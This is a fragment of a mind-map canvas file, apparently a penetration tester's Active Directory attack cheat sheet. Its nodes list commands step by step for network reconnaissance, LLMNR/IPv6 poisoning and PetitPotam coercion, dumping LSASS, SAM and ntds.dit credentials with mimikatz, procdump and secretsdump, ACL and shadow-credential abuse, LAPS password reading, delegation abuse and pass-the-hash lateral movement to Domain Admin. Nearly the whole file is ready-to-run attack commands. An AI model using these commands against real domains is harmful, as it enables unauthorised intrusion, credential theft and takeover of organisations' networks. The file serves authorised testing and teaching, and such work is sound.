{"type":"text","text":"```cmd\nSharpChromium.exe\n```","id":"c6179de1f7e86cb1","x":7280,"y":-2619,"width":221,"height":50},
{"type":"text","text":"```bash\nacltoolkit <domain>/<user>:'<password>'@<target> get-objectacl [-all] -object <object>\n```","id":"0e23b2fde7d80b08","x":6942,"y":578,"width":788,"height":65},
{"type":"text","text":"Can change \nmsDS-KeyCredentialLInk\n(Generic Write) + ADCS","id":"9eea463093804a97","x":6942,"y":-860,"width":231,"height":89},
{"type":"text","text":"On Group","id":"9b89e55478b8a09a","x":6942,"y":-541,"width":112,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -p '<password>' --lsa\n```","id":"2e1ac524b3924b63","x":6987,"y":-3416,"width":569,"height":50},
{"type":"text","text":"```cmd\nmklink /d c:\\shadowcopy\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\\n```\n","id":"5a4d79732a67a80f","x":7620,"y":-3535,"width":636,"height":50},
{"type":"text","text":"Result / Go to","id":"bb8f75c540107161","x":8379,"y":-3346,"width":164,"height":60},
{"type":"text","text":"```cmd\ndiskshadow list shadows all\n```\n","id":"c609e6aecfbef632","x":7218,"y":-3537,"width":280,"height":55},
{"type":"text","text":"```cmd\ncrackmapexec smb <ip_range> -u <user> -p <password> --sam\n```","id":"690869a90c9f57b0","x":6977,"y":-4008,"width":694,"height":50},
{"type":"text","text":"```cmd\nlsassy -d <domain> -u <user> -p <password> $ip\n```","id":"944c929db022e960","x":6977,"y":-4124,"width":475,"height":50},
{"type":"text","text":"```cmd\ncrackmapexec smb <ip_range> -u <user> -p <password> -M lsassy\n```","id":"bbb0d637d551e100","x":6977,"y":-4210,"width":694,"height":50},
{"type":"text","text":"```cmd\nmimikatz.exe \"privilege::debug\" \"lsadump::sam\" \"exit\"\n```\n","id":"84289f513bd2e2db","x":6984,"y":-3690,"width":636,"height":50},
{"type":"text","text":"```metasploit\nhashdump\n```","id":"b5907e8a280c9722","x":6977,"y":-3942,"width":173,"height":60},
{"type":"text","text":"Administrator access","id":"dd0c3984ff99dfcc","x":6206,"y":-3289,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"```cmd\nPPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp\n```","id":"08336a9e3e74b49e","x":7321,"y":-4709,"width":455,"height":50},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonPasswords\" \"exit\"\n```","id":"6d6a0fb94d0b9ffe","x":6977,"y":-4393,"width":475,"height":70},
{"type":"text","text":"LSASS as a Protected Process","id":"ab8b5c7701263757","x":6977,"y":-4643,"width":250,"height":60},
{"type":"text","text":"```metasploit\nload kiwi\n```","id":"44abc2dfd5c5bd7d","x":6977,"y":-4287,"width":170,"height":50},
{"type":"text","text":"```cmd\nprocdump.exe -accepteula -ma lass.exe lsass.dmp\n```","id":"0576da13dd3003a1","x":6977,"y":-4463,"width":475,"height":50},
{"type":"text","text":"```cmd\nreg.exe save hklm\\sam <file>; reg.exe save hklm\\security <file>; reg.exe save hklm\\system <file>\n```\n","id":"d6d4c74515bf4ede","x":6977,"y":-3866,"width":852,"height":50},
{"type":"text","text":"```bash\nreg.py <domain>/<user>:<password>@$ip backup -o '\\\\<smb_ip>\\share'\n```\n","id":"b5d8c3aeca914f84","x":6977,"y":-3782,"width":592,"height":50},
{"type":"text","text":"```metasploit\ncreds_all\n```","id":"5380c90161fa5a28","x":7227,"y":-4287,"width":170,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py <domain>/<user>:<password>@$ip\n```\n","id":"f0d3f432b33385af","x":6984,"y":-3620,"width":468,"height":50},
{"type":"text","text":"Who can read LAPS","id":"e48a2715efdeda5f","x":7205,"y":692,"width":199,"height":60},
{"type":"text","text":"```cmd\nnet user <user> <password> /domain\n```","id":"d0999fab6e5e57b5","x":7769,"y":50,"width":380,"height":60},
{"type":"text","text":"```bash\ntargetedKerberoast.py -d <domain> -u <user> -p <pass>\n```","id":"4532e54c2b563b93","x":7769,"y":140,"width":532,"height":60},
{"type":"text","text":"msDs-AllowedToActOnBehalf","id":"7e898e8fd9ae7305","x":7465,"y":-143,"width":298,"height":50},
{"type":"text","text":"```bash\ncrackmapexec ldap <dc_ip> -d <domain> -u <user> -p <password> --module laps\n```","id":"93978e47cd1a0302","x":7202,"y":989,"width":835,"height":50},
{"type":"text","text":"```bloodhound\nMATCH p=(g:Group)-[:ReadLAPSPassword]->(c:Computer) RETURN p\n```","id":"9d5d5e1194f5d6ef","x":7470,"y":692,"width":567,"height":60},
{"type":"text","text":"```powershell\nforeach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where{$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}\n```","id":"bcfec516647ac18b","x":7205,"y":852,"width":832,"height":111},
{"type":"text","text":"```cmd\nGet-LAPSPasswords-DomainController <ip_dc> -Credential <domain>\\<login> | Format-Table -AutoSize\n```","id":"99638d194530b526","x":7202,"y":771,"width":835,"height":60},
{"type":"text","text":"Shadow credentials","id":"bfe1e8b701ace933","x":7851,"y":-43,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"RBCD","id":"4eab57883025e3e2","x":7851,"y":-148,"width":250,"height":60,"color":"#0fd7a5"},
{"type":"text","text":"```bash\nldeep ldap -u <user> -p <pwd> -d <domain> -s ldap://<dc> add_to_group \"CN=<user>,DC=<domain>\" \"CN=<group>,DC=<domain>\"\n```","id":"00a93f7a6658899f","x":7907,"y":-471,"width":388,"height":139},
{"type":"text","text":"```powershell\nazuread_decrypt_msol_v2.ps1\n```","id":"a9ad5924645462b1","x":7739,"y":-1825,"width":576,"height":60},
{"type":"text","text":"Add Key Credentials","id":"042ff820e2c81631","x":7465,"y":-43,"width":231,"height":50},
{"type":"text","text":"Add SPN \n(target Kerberoasting)","id":"3ffc8f40ee50abe2","x":7499,"y":132,"width":231,"height":75},
{"type":"text","text":"Change password","id":"6a7920782db4a1ab","x":7499,"y":55,"width":231,"height":50},
{"type":"text","text":"Logon script","id":"91f9299b15765798","x":7499,"y":317,"width":231,"height":50},
{"type":"text","text":"```bash\ncertipy shadow auto '-u <user>@<domain>'-p <password> -account '<target_aacount>'\n```","id":"4835c0e3711a2c90","x":7475,"y":-845,"width":499,"height":60},
{"type":"text","text":"```cmd\nWhisker.exe\n```","id":"d95d2c6ce7f25ebb","x":7475,"y":-920,"width":181,"height":60},
{"type":"text","text":"Result / Go to","id":"44c314669b868176","x":8073,"y":-1057,"width":164,"height":60},
{"type":"text","text":"```impacket\ndacledit.py\n```","id":"42836b3bde5f516a","x":7907,"y":-272,"width":206,"height":50},
{"type":"text","text":"```cmd\nnet group \"<group>\" <myuser> /add/domain\n```","id":"1cf09dcfa1e4b95c","x":7907,"y":-591,"width":388,"height":50},
{"type":"text","text":"```cmd\nnet user <user> <password> /domain\n```","id":"8693e9f004a3e974","x":7464,"y":397,"width":380,"height":50},
{"type":"text","text":"```bash\npywhisker.py\n```","id":"d3d9a7005df393fb","x":7475,"y":-745,"width":201,"height":60},
{"type":"text","text":"```impacket\nowneredit.py\n```","id":"6cfc12d660209956","x":7645,"y":-272,"width":206,"height":50},
{"type":"text","text":"Add Key Credentials","id":"e76104426c2059c9","x":7499,"y":232,"width":231,"height":50},
{"type":"text","text":"ForceChangePassword","id":"da2835100e5744cb","x":7173,"y":397,"width":231,"height":50},
{"type":"text","text":"GenericAl / GenericWrite","id":"50cd8ffb6e7feae1","x":7173,"y":182,"width":231,"height":50},
{"type":"text","text":"```bash\npywhisker.py -d \"FQDN_DOMAIN\" -u \"user1\" -p \"CERTIFICATE_PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"\n```","id":"b97bf84fc17f1a69","x":7705,"y":-767,"width":499,"height":103},
{"type":"text","text":"Add group member","id":"a85596ca7bc17628","x":7622,"y":-521,"width":206,"height":50},
{"type":"text","text":"Shadow credentials","id":"6f712662d6a44a96","x":7790,"y":232,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"Access","id":"6a9398679c2db8bf","x":7790,"y":317,"width":107,"height":50,"color":"#969292"},
{"type":"text","text":"Lateral move PTT","id":"78d463c35e3506c4","x":8748,"y":-2097,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Lateral move PTH","id":"01bc67671573991f","x":8748,"y":-2159,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Service account","id":"7b7b68d692f5bb2a","x":8614,"y":-3257,"width":250,"height":60},
{"type":"text","text":"Lateral move PTH","id":"63583f0cfbabe5c7","x":8791,"y":-3787,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Lateral move PTC","id":"812917adf0b17d20","x":8748,"y":-2037,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Result / Go to","id":"154cb251c50baccb","x":8256,"y":-2102,"width":164,"height":60},
{"type":"text","text":"NT hash","id":"13b9e853efc38b46","x":8522,"y":-2159,"width":146,"height":50,"color":"2"},
{"type":"text","text":"ccache","id":"c24e4f3a957cbd4c","x":8522,"y":-2097,"width":146,"height":50},
{"type":"text","text":"pfx","id":"cf7f32390e78cf3f","x":8522,"y":-2037,"width":146,"height":50},
{"type":"text","text":"User with clear text pass","id":"6c4ffa47e9eee6af","x":7907,"y":397,"width":260,"height":50,"color":"#37ff00"},
{"type":"text","text":"```bash\nmssqlclient.py -windows-auth <domain>/<user>:<password>@$ip\n```","id":"bf0b0d71e2265d0d","x":11364,"y":-4755,"width":563,"height":58},
{"type":"text","text":"Result / Go to","id":"22409a42bd78c108","x":7894,"y":-2857,"width":164,"height":60},
{"type":"text","text":"Lateral move\n(clear text pass)","id":"c4e5a3a8f15c2ec9","x":8163,"y":-2837,"width":186,"height":83,"color":"#484e7f"},
{"type":"text","text":"ACL","id":"90d79ba9cd6eff86","x":8234,"y":-2344,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"Cached domain logon","id":"86db222ae37dfcfc","x":8614,"y":-3435,"width":250,"height":60},
{"type":"text","text":"Machine account","id":"e932241847342265","x":8614,"y":-3346,"width":250,"height":60},
{"type":"text","text":"User + Pass","id":"9c8151e3680bc4c0","x":8937,"y":-3299,"width":146,"height":50,"color":"#37ff00"},
{"type":"text","text":"Hashes NTLM","id":"2c10e95603af0079","x":8791,"y":-3857,"width":146,"height":50,"color":"2"},
{"type":"text","text":"MsCache 2","id":"9f2ca25473486726","x":8937,"y":-3430,"width":146,"height":50,"color":"2"},
{"type":"text","text":"Result / Go to","id":"c44bace6ceaa4199","x":7993,"y":-2298,"width":164,"height":60},
{"type":"text","text":"```bash\nsecretsdump.py -system SYSTEM -sam SAMLOCAL\n```","id":"2f9680d165e649d1","x":7928,"y":-3817,"width":451,"height":50},
{"type":"text","text":"Result / Go to","id":"e5e7c6d6b25845d1","x":8545,"y":-3822,"width":164,"height":60},
{"type":"text","text":"User + Pass","id":"3191c8e9d0e37f71","x":8234,"y":-2254,"width":186,"height":50,"color":"#37ff00"},
{"type":"text","text":"User + Pass","id":"12815e1edb91426e","x":8163,"y":-2907,"width":186,"height":50,"color":"#37ff00"},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug\" \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords\" \"exit\"\n```","id":"71c470d712e486a0","x":7539,"y":-4473,"width":475,"height":70},
{"type":"text","text":"```cmd\nmimikatz \"!+\" \"!processprotect /process:lsass.exe /remove\" \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonpasswords\"\"!processprotect /process:lsass\" \"!-\" \n```\n\n//With mimidriver.sys","id":"125e77d4c00e2025","x":7321,"y":-4613,"width":832,"height":110},
{"type":"text","text":"Result / Go to","id":"d72747d7cb35bc3c","x":8108,"y":-4292,"width":164,"height":60},
{"type":"text","text":"User + Pass","id":"6f118864c7314309","x":8377,"y":-4403,"width":146,"height":50,"color":"#37ff00"},
{"type":"text","text":"Hashes NTLM","id":"b754ee69d4ed4b5e","x":8377,"y":-4287,"width":146,"height":50,"color":"2"},
{"type":"text","text":"Lateral move (PTH/PTK)\n(Clear text pass in some case)","id":"bf855e68052cd589","x":8377,"y":-4190,"width":250,"height":89,"color":"#484e7f"},
{"type":"text","text":"```powershell\ncmd /k tscon <id> /dest-console\n```","id":"e58551763618e1d8","x":7542,"y":-1904,"width":492,"height":60},
{"type":"text","text":"```bash\nmasky -d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> $ip\n```","id":"ad339b4a6c75c078","x":7317,"y":-2097,"width":846,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <password> -M msol\n```","id":"f485ecfd6de72101","x":7739,"y":-1735,"width":576,"height":60},
{"type":"text","text":"abuse sccm","id":"00bbc68a369de3b7","x":10732,"y":-7163,"width":129,"height":55},
{"type":"text","text":"Find MSSQL access","id":"4766d1829d768b22","x":10746,"y":-6998,"width":205,"height":60},
{"type":"text","text":"```cmd\nCMPivot\n```","id":"c5338b800fec9a77","x":10951,"y":-7246,"width":192,"height":60},
{"type":"text","text":"```cmd\ndnscmd.exe /config /serverlevelplugindll <\\\\path\\to\\dll>\n```\n\\\\ Need a dnsadmin user","id":"4310d7e95ca260e2","x":7254,"y":1636,"width":531,"height":94},
{"type":"text","text":"DNSadmins abuse\n(CVE-2021-40469)","id":"f5a9188c3895a181","x":6942,"y":1643,"width":262,"height":79,"color":"#7c0404"},
{"type":"text","text":"DcSync","id":"313fd181331b5583","x":8420,"y":-1765,"width":133,"height":60,"color":"#8199cf"},
{"type":"text","text":"Lateral move RDP","id":"7c619f2d200d410e","x":8122,"y":-1899,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"interactive-shell","id":"b757b1f6578a4ea4","x":11061,"y":-5784,"width":193,"height":60},
{"type":"text","text":"Result / Go to","id":"676619b79cfc55fb","x":12011,"y":-5060,"width":164,"height":60},
{"type":"text","text":"```bash\npsexec.py <domain>/<user>:<password>@$ip\n```","id":"d32a2584275683b7","x":11515,"y":-5751,"width":563,"height":58},
{"type":"text","text":"Password","id":"dd9e84f58aa65a2d","x":10529,"y":-5489,"width":124,"height":50},
{"type":"text","text":"Cleartext password","id":"86a3945122ffe31d","x":10717,"y":-5494,"width":193,"height":60},
{"type":"text","text":"Local User","id":"bcaff9e9fcabbd8e","x":10529,"y":-6000,"width":124,"height":50},
{"type":"text","text":"MSSQL","id":"d0b89121392e5a17","x":10529,"y":-6805,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bash\nmssqlclient.py -windows-auth <domain>/<user>:<password>@$ip\n```\n(pr # 1397)","id":"d2dbc503a63e102a","x":10746,"y":-6396,"width":563,"height":95},
{"type":"text","text":"Trust link","id":"01a7f9e2c20495a9","x":10746,"y":-6684,"width":205,"height":60},
{"type":"text","text":"```bash\ncertipy auth-pfx <crt_file> -dc-ip <dc_ip><user>@$ip\n```","id":"da9534c1d8f58cf3","x":11307,"y":-1695,"width":517,"height":60},
{"type":"text","text":"```bash\nexport KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache\n```","id":"0c748a95b5e9f2d1","x":11043,"y":-2919,"width":583,"height":60},
{"type":"text","text":"```bash\nproxychains lookupsid.py <domain>/<user>@$ip -no-pass -domain-sids\n```","id":"68840cfdd897b60b","x":10905,"y":-2236,"width":655,"height":60},
{"type":"text","text":"Kerberos","id":"5667e163f4cec8fe","x":10526,"y":-2529,"width":124,"height":50},
{"type":"text","text":"Schannel","id":"ca5159389c68cd68","x":11209,"y":-1308,"width":250,"height":60},
{"type":"text","text":"Lateral move","id":"5dd4da896383237f","x":10047,"y":-4337,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"NTLM hash","id":"f54698defdf00d49","x":10525,"y":-3775,"width":124,"height":50},
{"type":"text","text":"WSUSpect","id":"d559be36feae3d17","x":10529,"y":-7390,"width":148,"height":60},
{"type":"text","text":"Certificate (pfx)","id":"18ba71ade68e1018","x":10540,"y":-1538,"width":166,"height":50},
{"type":"text","text":"Socks (With NTLM relay)","id":"05903d2fa40c9ac7","x":10540,"y":-2072,"width":221,"height":50,"color":"3"},
{"type":"text","text":"```powershell\nWSUSpendu.ps1\n```\n// Need compromised WSUS server","id":"73a52ddf03cdb0c0","x":10732,"y":-7411,"width":411,"height":102},
{"type":"text","text":"sccm admin","id":"aaceabe15cb4cd93","x":10529,"y":-7161,"width":148,"height":50},
{"type":"text","text":"```cmd\nrubeus monitor /interval:5\n```","id":"7bac45286d721dca","x":12024,"y":1840,"width":602,"height":60},
{"type":"text","text":"DcSync","id":"c90d2b1fbd0f3886","x":13193,"y":1843,"width":120,"height":50,"color":"#8199cf"},
{"type":"text","text":"Pass The Ticket","id":"2e546c1170aca574","x":12892,"y":1845,"width":187,"height":50,"color":"#484e7f"},
{"type":"text","text":"Domain Admin","id":"972403b8a80a9034","x":13394,"y":1843,"width":164,"height":50,"color":"1"},
{"type":"text","text":"Get tickets","id":"5e1d489a07e573df","x":11571,"y":1635,"width":250,"height":60},
{"type":"text","text":"```bloodhound\nMATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..](c)) RETURN p\n```","id":"d2f3b330ee4298d8","x":11571,"y":1454,"width":1055,"height":60},
{"type":"text","text":"```mimikatz\nprivilege::debug sekurlsa::ticket /export sekurlsa::tickets /export\n```","id":"99efe18fd67e8e82","x":11907,"y":1543,"width":719,"height":60},
{"type":"text","text":"(Force_connection_with_coerced_auth)","id":"1fee4b9da12fdb94","x":11571,"y":1840,"width":377,"height":60,"color":"3"},
{"type":"text","text":"```cmd\nrubeus dump /service:krbtgt /nowrap\n```","id":"f1921ab556ed9233","x":11907,"y":1635,"width":719,"height":60},
{"type":"text","text":"```cmd\nrubeus dump /luid:0xdeadbeef /nowrap\n```","id":"a6c7adc6c3b718ce","x":11907,"y":1722,"width":719,"height":60},
{"type":"text","text":"Kerberos TGT","id":"3aef9a1f3068e06f","x":12874,"y":1585,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bloodhound\nMATCH (c:Computer {unconstraineddelegation:true}) RETURN c\n```","id":"4c7b6e99ea9ebf66","x":11571,"y":1365,"width":582,"height":60},
{"type":"text","text":"```Powershell\nGet-NetComputer -Unconstrained\n```","id":"f71590b1a92f572e","x":11571,"y":1187,"width":453,"height":60},
{"type":"text","text":"```PowerView\nGet-DomainComputer -Unconstrained -Properties DnsHostName\n```","id":"fb65a229e0501b4d","x":11571,"y":1276,"width":582,"height":60},
{"type":"text","text":"Kerberos TGT","id":"4b5778ca72c23738","x":12688,"y":1845,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bloodhound\nMATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p\n```","id":"d6be9d4a9bf6f502","x":11571,"y":2144,"width":845,"height":60},
{"type":"text","text":"```PowerView\nGet-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo\n```","id":"425c87ab5d80738a","x":11571,"y":1960,"width":845,"height":60},
{"type":"text","text":"```PowerView\nGet-DomainUser -TrustedToAuth\n```","id":"f4c52890fde6a259","x":11571,"y":2052,"width":368,"height":60},
{"type":"text","text":"```bash\natexec.py -hashes \":<hash>\"<user>@$ip \"command\"\n```","id":"245bad8ec78f2fc9","x":11364,"y":-4346,"width":563,"height":58},
{"type":"text","text":"```bash\nsmbexec.py -hashes \":<hash>\"<user>@$ip\n```","id":"2859dbe9aa4c6a15","x":11364,"y":-4268,"width":563,"height":58},
{"type":"text","text":"```bash\npsexec.py -hashes \":<hash>\" <user>@$ip\n```","id":"8b16c01a327c2888","x":11364,"y":-4651,"width":563,"height":72},
{"type":"text","text":"```powerhell\npsexec.exe -AcceptEULA \\\\>ip>\n```","id":"259f35edcbfa52f9","x":11364,"y":-4555,"width":563,"height":72},
{"type":"text","text":"Pass the Certificate","id":"93adac49c097b6c7","x":10905,"y":-1417,"width":223,"height":60},
{"type":"text","text":"```bash\nproxychains mssqlclient.py -windows-auth <domain>/<user>@$ip -no-pass\n```","id":"aa7c68f3251c5659","x":10905,"y":-2149,"width":655,"height":60},
{"type":"text","text":"```bash\nproxychains secretsdump -no-pass '<domain>'/'<iser>'@$ip\n```","id":"de40c9f14cdb0900","x":10905,"y":-2072,"width":655,"height":60},
{"type":"text","text":"```bash\nproxychains atexec.py -no-pass <domain>/<user>@$ip \"command\"\n```","id":"ae6c711c58423f43","x":11197,"y":-1989,"width":599,"height":60},
{"type":"text","text":"pkinit","id":"1a8f05909c496f44","x":11209,"y":-1487,"width":250,"height":60},
{"type":"text","text":"```bash\nproxychains smbexec.py -no-pass <domain>/<user>@$ip\n```","id":"490a88aa3876d257","x":11197,"y":-1913,"width":599,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -p <password> -d <domain>\n```","id":"a5f2d11b325a4a6d","x":11364,"y":-5269,"width":563,"height":58},
{"type":"text","text":"SMB","id":"ff35485c4e76a7f7","x":11061,"y":-3603,"width":123,"height":60},
{"type":"text","text":"RDP","id":"22d8808e96c432cc","x":11061,"y":-3755,"width":123,"height":60},
{"type":"text","text":"```metasploit\nwindows/gather/credentials/domain_hashdump\n```","id":"a2e7ddb8ae593517","x":10967,"y":-398,"width":477,"height":50},
{"type":"text","text":"Domain Admin","id":"7bbbb1f1f1b64494","x":10348,"y":-304,"width":178,"height":60,"color":"1"},
{"type":"text","text":"dump ntds.dit","id":"655beb3d5aec0d6d","x":10717,"y":-448,"width":143,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb <dcip> -u <user> -p <password> -d <domain> --ntds\n```","id":"b7606b46a285b27a","x":10967,"y":-543,"width":593,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py '<domain>/<user>:<pass>'@$ip\n```","id":"6012d303158fd87f","x":10967,"y":-473,"width":593,"height":50},
{"type":"text","text":"Credentials","id":"4724b278ed4c389f","x":12681,"y":-164,"width":164,"height":50,"color":"#37ff00"},
{"type":"text","text":"```cmd\nntdsutil \"ac i ntds\" \"ifm\" \"create full c:\\temp\" q q \n```","id":"2d8fead620422c5d","x":10967,"y":-324,"width":477,"height":50},
{"type":"text","text":"```bash\ndpapi.py backupkeys -hashes ':<hash>' -t Administrator@<dc_ip> --export\n```\n// note: dpapi.py != DonPAPI","id":"e4ec6f469ddbddd0","x":10967,"y":-189,"width":658,"height":100},
{"type":"text","text":"```bash\nsecretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract\n```","id":"c6d21d06964a687e","x":11505,"y":-324,"width":976,"height":50},
{"type":"text","text":"```bash\nDonPAPI -pvk <domain_backupkey.pvk> -h ':<hash>' <domain>/<user>@<ip_range>\n```","id":"64ee3d82af749d97","x":11681,"y":-164,"width":681,"height":50},
{"type":"text","text":"Result / Go to","id":"0d5d922cbb97dc89","x":11797,"y":-498,"width":164,"height":60},
{"type":"text","text":"Crack hash","id":"371f86648b2eec2a","x":12062,"y":-543,"width":146,"height":50,"color":"2"},
{"type":"text","text":"Lateral move","id":"bae22edd1ff0f905","x":12062,"y":-446,"width":146,"height":60,"color":"#484e7f"},
{"type":"text","text":"Get unconstrained delegation machines","id":"e4f4a04c1d1f6b48","x":11103,"y":1319,"width":333,"height":50},
{"type":"text","text":"Result / Go to","id":"7ef897d4f537bda8","x":12421,"y":-169,"width":164,"height":60},
{"type":"text","text":"Get constrained delegation ","id":"7d6fa83f5c34803a","x":11103,"y":2094,"width":333,"height":50},
{"type":"text","text":"Unconstrained delegation","id":"890b3efaeba88777","x":10756,"y":1540,"width":250,"height":60},
{"type":"text","text":"UAC: ADS_UF_TRUSTED_FOR_DELEGATION","id":"bab3ddbc48446593","x":11103,"y":1732,"width":381,"height":50},
{"type":"text","text":"Enterprise Admin","id":"5d3504501ebf75bb","x":13979,"y":-483,"width":250,"height":60,"color":"#7600ad"},
{"type":"text","text":"```bash\nnmap -Pn -sC -sV -oA $ip.output $ip\n```","id":"5aea1cf60aabd994","x":-1419,"y":-705,"width":499,"height":50},
{"type":"text","text":"```bash\nnmap -Pn --script smb-vuln* -p 139,445 $ip\n```","id":"970caa7ff00527ff","x":-1419,"y":-773,"width":499,"height":50},
{"type":"text","text":"Find vulnerable host","id":"e28615a1a57b8503","x":-799,"y":-773,"width":250,"height":60,"color":"4"},
{"type":"text","text":"```bash\nnmap -Pn -sC -sV -oA -p- $ip.output $ip\n```","id":"2cadfd052197f008","x":-1419,"y":-637,"width":499,"height":50},
{"type":"text","text":"```bash\nARP poisoning\n```","id":"5ffdaedfa603d595","x":-1419,"y":1155,"width":280,"height":62},
{"type":"text","text":"```bash\nsmbmap -u \"\" -p \"\" -P 445 -H <dc-ip> && smbmap -u \"guest\" -p \"\" -P 445 -H <dc-ip>\n```","id":"d70f0e48b88f0c2b","x":-1419,"y":-128,"width":409,"height":60},
{"type":"text","text":"```bash\nenum4linux -a -u \"\" -p \"\" <dc-ip> && enum4linux -a -u \"guest\" -p \"\" <dc-ip>\n```","id":"de65e76747b04d9e","x":-1419,"y":-236,"width":839,"height":81},
{"type":"text","text":"```bash\nnmap -sU -sC -sV -oA $ip.UDP-output $ip\n```","id":"09bbbed589f90ee7","x":-1419,"y":-571,"width":499,"height":50},
{"type":"text","text":"User found","id":"475c8040ecef93ce","x":-517,"y":482,"width":164,"height":60,"color":"#31dbdd"},
{"type":"text","text":"```bash\nnslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>\n```","id":"552dbd3bdd5243b3","x":-1419,"y":-396,"width":560,"height":50},
{"type":"text","text":"```bash\nnmcli dev show eth0\n```","id":"3a42b30472341f68","x":-1419,"y":-475,"width":306,"height":60},
{"type":"text","text":"Coerce","id":"6a7277f50eb06e79","x":-1713,"y":1258,"width":187,"height":60,"color":"5"},
{"type":"text","text":"Unauthent PetitPotam\n(CVE-2022-26925)","id":"b5259f511998e728","x":-1404,"y":1258,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bash\nPetitPotam.py -d <domain> <listiner_ip> <target-ip>\n```","id":"18213f5195f600ba","x":-1090,"y":1258,"width":507,"height":60},
{"type":"text","text":"```bash\nbettercap\n```","id":"5f17da44a3fac888","x":-1081,"y":1158,"width":283,"height":59},
{"type":"text","text":"```bash\nresponder -i eth0 \n```","id":"f95aa1b75c2a67b8","x":-1083,"y":893,"width":285,"height":59},
{"type":"text","text":"```bash\nresponder -i eth0 --lm\n```","id":"545e543172dc6d51","x":-1081,"y":964,"width":283,"height":59},
{"type":"text","text":"```bash\nLLMNR / NBTNS / MDNS\n```","id":"44d7daa03cbf639b","x":-1419,"y":931,"width":280,"height":62},
{"type":"text","text":"List **guest acces**s on SMB share","id":"8e9ea2e9822ae2b1","x":-1713,"y":-53,"width":187,"height":123,"color":"5"},
{"type":"text","text":"```bash\nIPv6 preferef to IPv4\n```","id":"c4b69d972e7ee1e9","x":-1419,"y":1053,"width":280,"height":62},
{"type":"text","text":"Poisoning SMB -> HTTP ->","id":"ff4e51f72dab03cf","x":-583,"y":1055,"width":164,"height":60,"color":"3"},
{"type":"text","text":"Find user list","id":"bc52dd330dabaa5e","x":-1713,"y":542,"width":187,"height":60,"color":"5"},
{"type":"text","text":"Poisoning","id":"12acd8fe356c1bfc","x":-1713,"y":993,"width":187,"height":60,"color":"5"},
{"type":"text","text":"```bash\nldapsearch -x -H ldap://$ip -s base\n```","id":"0ea07e6ccb96eb5e","x":-1425,"y":323,"width":566,"height":59},
{"type":"text","text":"```bash\nnmap -n -sV --script \"ldap* and not brute\" -p 389 $ip\n```","id":"afad5fb61a5b41c8","x":-1425,"y":204,"width":566,"height":59},
{"type":"text","text":"```bash\nnmap -p 88 --script=krb5-enum-users --script-args=\"krb5-enum-users.realm='<domain',userdb=<users_list_file>\" $ip\n```","id":"7663efa4fca553c8","x":-1082,"y":651,"width":499,"height":110},
{"type":"text","text":"```bash\nOSINT - enumerate username on internet\n```","id":"ef4d1435f4127e9c","x":-1419,"y":663,"width":280,"height":85},
{"type":"text","text":"```bash\nmitm6 -d <domain>\n```","id":"9b97556bfac9f9d8","x":-1081,"y":1053,"width":283,"height":59},
{"type":"text","text":"```bash\nkerbrute userenum --dc $ip -d $domain /usr/share/wordlists/seclists/Usernames/Names/names.txt\n```","id":"b180dbfb40e13270","x":-1419,"y":780,"width":836,"height":79},
{"type":"text","text":"```bash\nnet rpc group members 'Domain Users' -W '<domain>' -l '<IP>' -U '%'\n```","id":"9c0090a0701fc05a","x":-1419,"y":553,"width":621,"height":74},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u '' -p ''\n```","id":"19c2801d90c6dac8","x":-1419,"y":40,"width":409,"height":60},
{"type":"text","text":"```bash\nsmbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip> \n```","id":"303ddccb2f582faa","x":-1419,"y":-44,"width":409,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb $ip --users\n```","id":"640fde233349daf8","x":-1419,"y":482,"width":409,"height":60},
{"type":"text","text":"User found","id":"e33d5d29466126f4","x":-713,"y":263,"width":164,"height":60,"color":"#31dbdd"},
{"type":"text","text":"```bash\nenum4linux -U <dc-ip> | grep 'user:'\n```","id":"d3eda11a689e3213","x":-1419,"y":411,"width":409,"height":60},
{"type":"text","text":"```bash\nnmap -Pn -sV --top-ports 50 --open $ip\n```","id":"e34cd4be899de1b1","x":-1419,"y":-841,"width":499,"height":50},
{"type":"text","text":"```bash\ndig axfr <domain_name> @<name_server>\n```","id":"7ea9e3211107b13f","x":-1424,"y":-298,"width":565,"height":50},
